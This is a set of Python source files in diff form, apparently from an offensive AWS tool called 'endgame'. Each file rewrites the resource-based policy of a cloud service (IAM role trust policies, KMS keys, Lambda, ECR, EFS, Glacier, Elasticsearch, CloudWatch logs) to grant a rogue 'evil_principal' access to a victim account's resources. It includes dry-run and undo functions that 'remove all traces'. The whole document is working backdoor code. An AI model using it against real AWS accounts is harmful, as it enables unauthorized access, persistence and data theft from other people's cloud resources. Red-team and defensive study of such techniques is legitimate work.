def set_rbp(self, evil_policy: dict) -> ResponseMessage:
new_policy = json.dumps(evil_policy)
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/logs.html#CloudWatchLogs.Client.put_resource_policy
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/logs.html#CloudWatchLogs.Client.put_destination_policy
success = True
try:
self.client.put_resource_policy(policyName=constants.SID_SIGNATURE, policyDocument=new_policy)
message = "success"
success = True
except self.client.exceptions.InvalidParameterException as error:
logger.debug(error)
logger.debug("Let's just try it again - AWS accepts it every other time.")
self.client.put_resource_policy(policyName=constants.SID_SIGNATURE, policyDocument=new_policy)
message = str(error)
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Remove all traces"""
operation = "UNDO"
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/logs.html#CloudWatchLogs.Client.delete_resource_policy
if not self.policy_exists:
message = f"The policy {constants.SID_SIGNATURE} does not exist."
success = True
else:
try:
self.client.delete_resource_policy(policyName=constants.SID_SIGNATURE)
message = f"Deleted the CloudWatch resource policy named {constants.SID_SIGNATURE}"
success = True
except botocore.exceptions.ClientError as error:
success = False
                message = str(error)
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
new_policy = constants.get_empty_policy()
response_message = ResponseMessage(message=message, operation=operation, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
original_policy=self.original_policy, updated_policy=new_policy,
resource_type=self.resource_type, resource_name=self.name,
service=self.service)
return response_message
class CloudwatchResourcePolicies(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "cloudwatch"
self.resource_type = "resource-policy"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("describe_resource_policies")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["resourcePolicies"]
for resource in these_resources:
name = resource.get("policyName")
# This is not a real ARN.
# We made it up because AWS doesn't have ARNs for CloudWatch resource policies ¯\_(ツ)_/¯
arn = f"arn:aws:logs:{self.region}:{self.current_account_id}:resource-policy:{name}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
resources.append(list_resources_response)
return resources


@ -0,0 +1,133 @@
from abc import ABCMeta, abstractmethod
import json
import logging
import copy
import boto3
import botocore
from botocore.exceptions import ClientError
from endgame.shared.response_message import ResponseMessage
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class ResourceType(object):
__meta_class__ = ABCMeta
def __init__(
self,
name: str,
resource_type: str,
service: str,
region: str,
client: boto3.Session.client,
current_account_id: str,
override_action: str = None,
include_resource_block: bool = True,
override_resource_block: str = None,
override_account_id_instead_of_principal: bool = False
):
self.name = name
self.resource_type = resource_type
self.client = client
self.current_account_id = current_account_id
self.service = service
self.region = region
self.include_resource_block = include_resource_block # Override for IAM
self.override_action = override_action # Override for IAM
self.override_resource_block = override_resource_block # Override for EFS
self.override_account_id_instead_of_principal = override_account_id_instead_of_principal # Override for logs, sns, sqs, and lambda
self.policy_document = self._get_rbp().policy_document
# Store an original copy of the policy so we can compare it later.
self.original_policy = copy.deepcopy(json.loads(json.dumps(self.policy_document.original_policy)))
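        # The json dumps/loads round-trip normalizes the snapshot into plain dicts and lists,
        # so later changes to self.policy_document do not affect it.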
def __str__(self):
return '%s' % (json.dumps(json.loads(self.policy_document.__str__())))
@abstractmethod
def _get_rbp(self) -> ResponseGetRbp:
raise NotImplementedError("Must override _get_rbp")
@property
@abstractmethod
def arn(self) -> str:
raise NotImplementedError("Must override arn")
@abstractmethod
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
raise NotImplementedError("Must override set_rbp")
def add_myself(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Add your rogue principal to the AWS resource"""
logger.debug(f"Adding {evil_principal} to {self.arn}")
evil_policy = self.policy_document.policy_plus_evil_principal(
victim_account_id=self.current_account_id,
evil_principal=evil_principal,
resource_arn=self.arn
)
if not dry_run:
set_rbp_response = self.set_rbp(evil_policy=evil_policy)
operation = "ADD_MYSELF"
message = set_rbp_response.message
success = set_rbp_response.success
else:
# new_policy = evil_policy
operation = "DRY_RUN_ADD_MYSELF"
message = "DRY_RUN_ADD_MYSELF"
try:
tmp = self._get_rbp()
success = tmp.success
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation=operation, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
original_policy=self.original_policy, updated_policy=evil_policy,
resource_type=self.resource_type, resource_name=self.name,
service=self.service)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Remove all traces"""
logger.debug(f"Removing {evil_principal} from {self.arn}")
policy_stripped = self.policy_document.policy_minus_evil_principal(
victim_account_id=self.current_account_id,
evil_principal=evil_principal,
resource_arn=self.arn
)
if not dry_run:
operation = "UNDO"
set_rbp_response = self.set_rbp(evil_policy=policy_stripped)
message = set_rbp_response.message
success = set_rbp_response.success
else:
operation = "DRY_RUN_UNDO"
message = "DRY_RUN_UNDO"
success = True
response_message = ResponseMessage(message=message, operation=operation, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
original_policy=self.original_policy, updated_policy=policy_stripped,
resource_type=self.resource_type, resource_name=self.name,
service=self.service)
return response_message
class ResourceTypes(object):
__meta_class__ = ABCMeta
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
self.client = client
self.current_account_id = current_account_id
self.region = region
def __str__(self):
        return json.dumps([resource.arn for resource in self.resources])
@property
@abstractmethod
def resources(self) -> [ListResourcesResponse]:
raise NotImplementedError("Must override property 'resources'")


@ -0,0 +1,101 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseMessage
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class EcrRepository(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "ecr"
self.resource_type = "repository"
self.region = region
self.current_account_id = current_account_id
self.name = name
self.include_resource_block = False
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
include_resource_block=self.include_resource_block)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
policy = constants.get_empty_policy()
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ecr.html#ECR.Client.get_repository_policy
response = self.client.get_repository_policy(repositoryName=self.name)
policy = json.loads(response.get("policyText"))
success = True
except self.client.exceptions.RepositoryPolicyNotFoundException:
logger.debug("Policy not found. Setting policy document to empty.")
success = True
except self.client.exceptions.RepositoryNotFoundException:
logger.critical("Repository does not exist")
success = False
except botocore.exceptions.ClientError:
# When there is no policy, let's return an empty policy to avoid breaking things
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy = json.dumps(evil_policy)
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ecr.html#ECR.Client.set_repository_policy
self.client.set_repository_policy(repositoryName=self.name, policyText=new_policy)
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class EcrRepositories(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "ecr"
self.resource_type = "repository"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("describe_repositories")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["repositories"]
for resource in these_resources:
name = resource.get("repositoryName")
arn = resource.get("repositoryArn")
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
resources.append(list_resources_response)
return resources


@ -0,0 +1,99 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseMessage
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class ElasticFileSystem(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "elasticfilesystem"
self.resource_type = "file-system"
self.region = region
self.current_account_id = current_account_id
self.name = name
# Override parent defaults because EFS is weird with the resource block requirements
self.override_resource_block = self.arn
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
override_resource_block=self.override_resource_block)
@property
def arn(self) -> str:
# NOTE: self.name represents the File System ID
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
try:
response = self.client.describe_file_system_policy(FileSystemId=self.name)
policy = json.loads(response.get("Policy"))
success = True
except self.client.exceptions.PolicyNotFound as error:
policy = constants.get_empty_policy()
success = True
except botocore.exceptions.ClientError:
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy = json.dumps(evil_policy)
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/efs.html#EFS.Client.put_file_system_policy
self.client.put_file_system_policy(FileSystemId=self.name, Policy=new_policy)
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class ElasticFileSystems(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "elasticfilesystem"
self.resource_type = "file-system"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("describe_file_systems")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["FileSystems"]
for resource in these_resources:
fs_id = resource.get("FileSystemId")
arn = resource.get("FileSystemArn")
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=fs_id)
resources.append(list_resources_response)
return resources


@ -0,0 +1,98 @@
import sys
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseMessage
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class ElasticSearchDomain(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "es"
self.resource_type = "domain"
self.region = region
self.current_account_id = current_account_id
self.name = name
super().__init__(name, self.resource_type, self.service, region, client, current_account_id)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
try:
            # https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/es.html#ElasticsearchService.Client.describe_elasticsearch_domain_config
response = self.client.describe_elasticsearch_domain_config(DomainName=self.name)
domain_config = response.get("DomainConfig")
policy = domain_config.get("AccessPolicies").get("Options")
if policy:
policy = json.loads(policy)
else:
policy = constants.get_empty_policy()
success = True
except botocore.exceptions.ClientError:
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
new_policy = json.dumps(evil_policy)
logger.debug("Setting resource policy for %s" % self.arn)
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/es.html#ElasticsearchService.Client.update_elasticsearch_domain_config
self.client.update_elasticsearch_domain_config(DomainName=self.name, AccessPolicies=new_policy)
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class ElasticSearchDomains(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "elasticsearch"
self.resource_type = "domain"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
response = self.client.list_domain_names()
if response.get("DomainNames"):
for domain_name in response.get("DomainNames"):
name = domain_name.get("DomainName")
arn = f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{name}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
# resources.append(domain_name.get("DomainName"))
resources.append(list_resources_response)
return resources


@ -0,0 +1,98 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseMessage
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class GlacierVault(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "glacier"
self.resource_type = "vaults"
self.region = region
self.current_account_id = current_account_id
self.name = name
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
override_resource_block=self.arn)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/glacier.html#Glacier.Client.get_vault_access_policy
response = self.client.get_vault_access_policy(vaultName=self.name)
policy = json.loads(response.get("policy").get("Policy"))
success = True
# This is silly. If there is no access policy set on the vault, then it returns the same error as if the vault didn't exist.
except self.client.exceptions.ResourceNotFoundException as error:
logger.debug(error)
success = True
except botocore.exceptions.ClientError:
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy = json.dumps(evil_policy)
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/glacier.html#Glacier.Client.set_vault_access_policy
self.client.set_vault_access_policy(vaultName=self.name, policy={"Policy": new_policy})
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class GlacierVaults(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "glacier"
self.resource_type = "vaults"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("list_vaults")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["VaultList"]
for resource in these_resources:
name = resource.get("VaultName")
arn = resource.get("VaultARN")
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
resources.append(list_resources_response)
return resources


@ -0,0 +1,107 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseMessage
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class IAMRole(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "iam"
self.resource_type = "role"
self.region = region
self.current_account_id = current_account_id
self.name = name
# Override parent values due to IAM being special
# Don't include the "Resource" block in the policy, or else the policy update will fail
# Instead of iam:*, we want to give sts:AssumeRole
self.include_resource_block = False
self.override_action = "sts:AssumeRole"
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
include_resource_block=self.include_resource_block, override_action=self.override_action)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}::{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
try:
response = self.client.get_role(RoleName=self.name)
policy = response.get("Role").get("AssumeRolePolicyDocument")
success = True
except self.client.exceptions.NoSuchEntityException:
logger.critical(f"There is no resource with the name {self.name}")
policy = constants.get_empty_policy()
success = False
except botocore.exceptions.ClientError:
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy = json.dumps(evil_policy)
try:
self.client.update_assume_role_policy(RoleName=self.name, PolicyDocument=new_policy)
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
logger.critical(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class IAMRoles(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "iam"
self.resource_type = "role"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("list_roles")
page_iterator = paginator.paginate()
for page in page_iterator:
roles = page["Roles"]
for role in roles:
path = role.get("Path")
arn = role.get("Arn")
name = role.get("RoleName")
# Special case: Ignore Service Linked Roles
if path.startswith("/aws-service-role/"):
# if path == "/service-role/" or path.startswith("/aws-service-role/"):
continue
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
resources.append(list_resources_response)
return resources


@ -0,0 +1,155 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from policy_sentry.util.arns import get_account_from_arn, get_resource_path_from_arn
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseMessage
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/kms.html
class KmsKey(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "kms"
self.resource_type = "key"
self.region = region
self.current_account_id = current_account_id
if name.startswith("alias"):
self.alias = name
name = self._get_key_id_with_alias(name, client)
self.name = name
else:
self.name = name
self.alias = None
self.override_resource_block = self.arn
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
override_resource_block=self.override_resource_block)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_key_id_with_alias(self, name: str, client: boto3.Session.client) -> str:
"""Given an alias, return the key ID"""
response = client.describe_key(KeyId=name)
key_id = response.get("KeyMetadata").get("KeyId")
return key_id
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/kms.html#KMS.Client.get_key_policy
logger.debug("Getting resource policy for %s" % self.arn)
try:
response = self.client.get_key_policy(KeyId=self.arn, PolicyName="default")
if response.get("Policy"):
policy = constants.get_empty_policy()
policy["Statement"].extend(json.loads(response.get("Policy")).get("Statement"))
else:
policy = constants.get_empty_policy()
success = True
except botocore.exceptions.ClientError:
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/kms.html#KMS.Client.put_key_policy
new_policy = json.dumps(evil_policy)
logger.debug("Setting resource policy for %s" % self.arn)
try:
self.client.put_key_policy(KeyId=self.name, PolicyName="default", Policy=new_policy)
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
logger.critical(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class KmsKeys(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "kms"
self.resource_type = "key"
self.current_account_id = current_account_id
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/kms.html#KMS.Paginator.ListKeys
def list_keys() -> list:
keys = []
paginator = self.client.get_paginator("list_keys")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["Keys"]
for resource in these_resources:
key_id = resource.get("KeyId")
arn = resource.get("KeyArn")
keys.append(arn)
return keys
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/kms.html#KMS.Paginator.ListAliases
def filter_with_aliases(all_key_arns) -> list:
keys = []
key_arns_with_aliases = []
aws_managed_key_arns = []
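            # Aliases beginning with "alias/aws" belong to AWS managed keys, whose key policies
            # cannot be modified by the account, so those key ARNs are collected and skipped.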
paginator = self.client.get_paginator("list_aliases")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["Aliases"]
for resource in these_resources:
alias = resource.get("AliasName")
key_id = resource.get("TargetKeyId")
arn = resource.get("AliasArn")
if alias.startswith("alias/aws") or alias.startswith("aws/"):
aws_managed_key_arns.append(arn)
if key_id:
aws_managed_key_arns.append(f"arn:aws:kms:{self.region}:{self.current_account_id}:key/{key_id}")
continue
else:
# keys.append(alias)
arn = f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{key_id}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=key_id, note=alias)
keys.append(list_resources_response)
key_arns_with_aliases.append(arn)
# If the key does not have an alias, return the key ID
for some_key_arn in all_key_arns:
if some_key_arn not in key_arns_with_aliases and some_key_arn not in aws_managed_key_arns:
key_id = get_resource_path_from_arn(some_key_arn)
arn = f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{key_id}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=key_id)
keys.append(list_resources_response)
return keys
key_ids = list_keys()
resources = filter_with_aliases(key_ids)
return resources


@ -0,0 +1,150 @@
import json
import logging
from abc import ABC
import boto3
import botocore
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.response_message import ResponseMessage
from endgame.shared.utils import get_sid_names_with_error_handling
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class LambdaFunction(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "lambda"
self.resource_type = "function"
self.region = region
self.current_account_id = current_account_id
self.name = name
super().__init__(name, self.resource_type, self.service, region, client, current_account_id)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}:{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
try:
response = self.client.get_policy(FunctionName=self.name)
policy = json.loads(response.get("Policy"))
success = True
except self.client.exceptions.ResourceNotFoundException as error:
logger.debug("The Policy does not exist. We will have to add it.")
success = True
except botocore.exceptions.ClientError as error:
logger.critical(error)
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy_document = PolicyDocument(
policy=evil_policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
new_policy_json = {
"Version": "2012-10-17",
"Statement": []
}
current_sids = get_sid_names_with_error_handling(self.original_policy)
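        # Only statements whose Sid is not already present get added, so add_permission is not
        # called for a StatementId that already exists on the original policy.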
success = True
try:
for statement in new_policy_document.statements:
if statement.sid not in current_sids:
self.client.add_permission(
FunctionName=self.name,
StatementId=statement.sid,
Action=statement.actions[0],
Principal=statement.aws_principals[0],
)
success = True
new_policy_json["Statement"].append(json.loads(statement.__str__()))
message = "success"
except botocore.exceptions.ClientError as error:
message = str(error)
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
success = False
policy_document = self._get_rbp().policy_document
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=policy_document.json, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Wraps client.remove_permission"""
logger.debug(f"Removing {evil_principal} from {self.arn}")
new_policy = constants.get_empty_policy()
operation = "UNDO"
message = "404: No backdoor statement found"
success = True
for statement in self.policy_document.statements:
if statement.sid == constants.SID_SIGNATURE:
if not dry_run:
try:
self.client.remove_permission(
FunctionName=self.name,
StatementId=statement.sid,
)
message = f"200: Removed backdoor statement from the resource policy attached to {self.arn}"
success = True
except botocore.exceptions.ClientError as error:
success = False
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
else:
new_policy["Statement"].append(json.loads(statement.__str__()))
response_message = ResponseMessage(message=message, operation=operation, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
original_policy=self.original_policy, updated_policy=new_policy,
resource_type=self.resource_type, resource_name=self.name,
service=self.service)
return response_message
